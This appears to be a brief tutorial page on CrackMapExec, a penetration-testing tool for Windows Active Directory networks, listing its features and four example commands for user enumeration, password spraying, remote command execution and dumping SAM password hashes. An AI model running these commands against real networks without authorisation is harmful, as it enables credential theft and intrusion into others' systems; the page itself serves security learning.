CrackMapExec (CME) is an open-source tool used for network enumeration and penetration testing, particularly on Windows networks. It automates the process of gathering information, executing advanced password attacks, and performing post-exploitation activities like lateral movement. CME is often referred to as the “Swiss Army knife” for targeting Windows Active Directory environments. 🛠️
Key Features of CrackMapExec
- Active Directory Enumeration: Enumerate domains, forests, users, groups, computers, and trust relationships. 📋
- Credential Brute Forcing: Attack various network services (e.g., SMB, RPC, LDAP, and WinRM) with password spraying, credential stuffing, and brute force attacks. 🔑
- Remote Code Execution: Execute commands and scripts remotely on target systems using PowerShell, WMI, SMB, and PSExec. 💻
- Lateral Movement: Perform lateral movement and jump between compromised machines using techniques like pass-the-hash, pass-the-ticket, and token impersonation. 🔗
- Integration Support: Integrate with other penetration testing tools, such as Metasploit, PowerShell Empire, and BloodHound. 🔄
Example Code Snippets
Here are some example commands you can use with CrackMapExec:
Example 1: Enumerating Domain Users
# Enumerate all users in the domain
crackmapexec smb 192.168.1.0/24 -u 'username' -p 'password' --users
Example 2: Password Spraying
# Perform password spraying attack
crackmapexec smb 192.168.1.0/24 -u 'admin' -p 'password123'
Example 3: Remote Code Execution
# Execute a command on a remote system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' -x 'whoami'
Example 4: Dumping SAM Hashes
# Dump local SAM hashes from a target system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' --sam
Learning Resources 📚
For more detailed guides and resources, you can visit the CrackMapExec Cheat Sheet or the PopLabSec tutorial12.